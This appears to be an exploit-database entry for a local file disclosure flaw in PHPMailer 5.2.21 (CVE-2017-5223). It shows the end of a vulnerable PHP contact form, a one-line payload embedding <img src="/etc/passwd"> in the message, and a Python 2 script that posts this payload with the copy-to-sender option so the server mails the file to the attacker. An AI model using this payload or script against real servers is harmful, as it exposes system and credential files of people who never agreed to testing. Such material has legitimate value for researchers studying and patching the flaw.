}
?>
<form action="/contact.php" method="post">
<p><label>Your Name<br /><input type="text" name="your-name" value="" size="40" /></span> </label></p>
<p><label>Your Email<br /><input type="email" name="your-email" value="" size="40" /></span> </label></p>
<p><label>Your Message<br /><textarea name="your-message" cols="40" rows="10"></textarea></label></p>
<p><input type="checkbox" name="cc" value="yes" /><span>Send me a copy of this message</span>
<p><input type="submit" value="submit" /></p>
// exploit //
Put <img src="/etc/passwd"> in the message (or other file to disclose).
// python code //
#!/usr/bin/python
import urllib
import urllib2
poc = """
# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223
"""
url = 'http://localhost/contact.php'
email = 'attacker@localhost'
payload = '<img src="/etc/passwd"'
values = {'action': 'send', 'your-name': 'Attacker', 'your-email': email, 'cc': 'yes', 'your-message': payload}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
html = response.read()
print html